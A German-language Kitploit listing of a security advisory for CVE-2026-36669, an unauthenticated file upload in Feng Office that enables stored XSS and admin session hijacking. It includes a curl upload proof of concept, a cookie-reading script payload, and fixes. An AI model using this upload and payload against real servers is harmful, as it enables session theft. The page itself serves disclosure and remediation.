Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-36669-FengOffice — Detailliertes Sicherheitsbulletin für CVE-2026-36669: nicht authentifizierter beliebiger Datei-Upload in Feng Office, der gespeichertes XSS und Session-Hijacking ermöglicht. Enthält technische Analyse, PoC und Behebungsmaßnahmen. | Kitploit
Tools/GitHubGitHub/firstlax6t/cve-2026-36669-fengoffice
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & Bildung
GitHubfirstlax6t/cve-2026-36669-fengoffice

CVE-2026-36669-FengOffice

Detailliertes Sicherheitsbulletin für CVE-2026-36669: nicht authentifizierter beliebiger Datei-Upload in Feng Office, der gespeichertes XSS und Session-Hijacking ermöglicht. Enthält technische Analyse, PoC und Behebungsmaßnahmen.

Repository anzeigen
36vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Sicherheitshinweis: CVE-2026-36669

Nicht authentifizierter, beliebiger Dateiupload in Feng Office Community Edition

Eine Schwachstelle für nicht authentifizierten, beliebigen Dateiupload existiert in ck_upload_handler.php in Feng Office Community Edition (Version 3.11.13.11). Dieser Fehler ermöglicht es entfernten, nicht authentifizierten Angreifern, beliebige Dateien (einschließlich bösartiger .html- oder .php-Skripte) in ein webzugängliches Verzeichnis hochzuladen. In Kombination mit fehlenden Cookie-Schutzmaßnahmen für Administratoren (HttpOnly) kann diese Schwachstelle zu gespeichertem Cross-Site Scripting (XSS) und administrativem Session-Hijacking führen.


Schwachstellenübersicht

MetrikDetails
CVE-IdentifikatorCVE-2026-36669
SchwachstellentypUneingeschränkter Upload von Dateien mit gefährlichem Typ (CWE-434)
Zugehörige SchwächeFehlende Authentifizierung für kritische Funktion (CWE-306)
Betroffenes ProduktFeng Office Community Edition
Betroffene VersionenVersion 3.11.13.11 (und möglicherweise frühere Versionen)
AusnutzungsstatusProof of Concept verifiziert
BehebungsstatusNicht gepatcht (Anbieter benachrichtigt, kein Patch innerhalb des standardmäßigen Offenlegungszeitraums bereitgestellt)

Technische Analyse

1. Fehlende Authentifizierungsgrenze (CWE-306)

Der Endpunkt ck_upload_handler.php fungiert als eigenständiges Skript. Es lädt oder erbt keine Authentifizierungs-Middleware oder Zugriffskontrolllisten (ACL) der Hauptanwendung. Folglich wird jede externe Anfrage, die direkt an dieses Skript gesendet wird, als authentifiziert behandelt.

2. Inaktive Erweiterungsvalidierung (CWE-434)

Im Quellcode von ck_upload_handler.php wurde die serverseitige Dateivalidierungslogik (Zeilen 21–25), die darauf ausgelegt ist, Uploads auf bestimmte Bildformate (.jpg, .png, .gif) zu beschränken, explizit auskommentiert:

root@kitploit:~
// $pattern = "/\.(jpg|png|gif)$/i";
// if (!preg_match($pattern,$_FILES['upload']['name'])) {
//     ...
// }

Da diese Regex-Einschränkung inaktiv ist, akzeptiert der Dateiuploadmechanismus jede vom Benutzer bereitgestellte Erweiterung.

3. Vorhersehbarer Pfad und direkte Ausführung

Das Skript verwendet die PHP-copy()-Funktion, um die hochgeladenen Dateien direkt in das /tmp/-Verzeichnis zu schreiben, das als webzugänglich konfiguriert ist.

4. Nachgelagerte Auswirkung: Session-Hijacking via gespeichertem XSS

Die globale Konfigurationsdatei application/config/config.php erzwingt das HttpOnly-Flag für Session-Cookies nicht. Wenn ein Angreifer eine .html-Datei mit clientseitigen Skriptblöcken hochlädt, führt jeder Administrator, der die Datei ansieht, das Skript im Kontext seiner aktiven Sitzung aus. Dies ermöglicht es Angreifern, aktive administrative Session-Tokens stillschweigend zu extrahieren.


Proof of Concept (PoC)

Hinweis: Dieses Proof of Concept wird ausschließlich zu Bildungs- und defensiven Prüfzwecken bereitgestellt.

Um die Schwachstelle zu verifizieren, senden Sie eine Multipart-POST-Anfrage mit einer harmlosen Verifikationsdatei (z.B. test.html) an den Endpunkt, wobei der erforderliche Parameter CKEditorFuncNum angehängt wird:

Anfrage

root@kitploit:~
curl -i -X POST \
  -F "[email protected]" \
  "http://<target-domain>/ck_upload_handler.php?CKEditorFuncNum=1"

Wobei test.html grundlegendes Proof-of-Concept-HTML-Markup enthält:

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
    <script>
        alert("Vulnerability Verified: " + document.cookie);
    </script>
</body>
</html>

Erwartete Antwort

Bei Verwundbarkeit antwortet der Server mit einem 200 OK-Status und gibt einen JavaScript-Block aus, der den Upload-Pfad angibt:

root@kitploit:~
<script type="text/javascript">
    window.parent.CKEDITOR.tools.callFunction("1", "/tmp/test.html", "");
</script>

Empfohlene Abhilfemaßnahmen

Wenn Sie eine betroffene Version von Feng Office betreiben, wenden Sie die folgenden manuellen Hotfixes an, um den Dateiupload-Endpunkt zu sichern:

1. Authentifizierungsdurchsetzung implementieren

Stellen Sie sicher, dass ck_upload_handler.php vor der Verarbeitung von Dateiuploadlogik auf aktive administrative Sitzungen prüft.

2. Serverseitige Dateivalidierung erneut aktivieren

Kommentieren Sie die Erweiterungsprüfungen aus und erzwingen Sie sie strikt. Lehnen Sie alle Uploads ab, die nicht explizit den erwarteten nicht ausführbaren Bild-MIME-Typen entsprechen:

root@kitploit:~
$pattern = "/\.(jpg|jpeg|png|gif)$/i";
if (!preg_match($pattern, $_FILES['upload']['name'])) {
    header("HTTP/1.1 403 Forbidden");
    exit("Invalid file type.");
}

3. HttpOnly-Cookies erzwingen

Ändern Sie Ihre PHP-Konfiguration oder die Bootstrap-Konfiguration der Anwendung, um sicherzustellen, dass Session-Cookies nicht über clientseitige Skripting-APIs zugänglich sind:

root@kitploit:~
session.cookie_httponly = On

Offenlegungszeitplan

  • 20. Februar 2026: Erste Entdeckung der Schwachstelle und erste Benachrichtigung an das Feng Office-Support-Team.
  • 12. März 2026: CVE-Identifikator von MITRE angefordert.
  • 15. März 2026: Anbieter bestätigt den Erhalt des Berichts und bittet um eine vorübergehende Pause zur Überprüfung der Ergebnisse.
  • 29. März 2026: MITRE vergibt offiziell CVE-2026-36669. Anbieter über die offizielle Zuordnungsverfolgungs-ID informiert; kein weiteres Update erhalten.
  • 29. Juni 2026: Letzte Mitteilung an den Anbieter mit einem 14-tägigen standardmäßigen Offenlegungszeitplan.
  • 13. Juli 2026: Frist für koordinierte Reaktion/Patches abgelaufen; keine Antwort erhalten.
  • 15. Juli 2026: Öffentliche Offenlegung des Hinweises.

Entdecker

Soufiane LAGZIRI

Tool herunterladen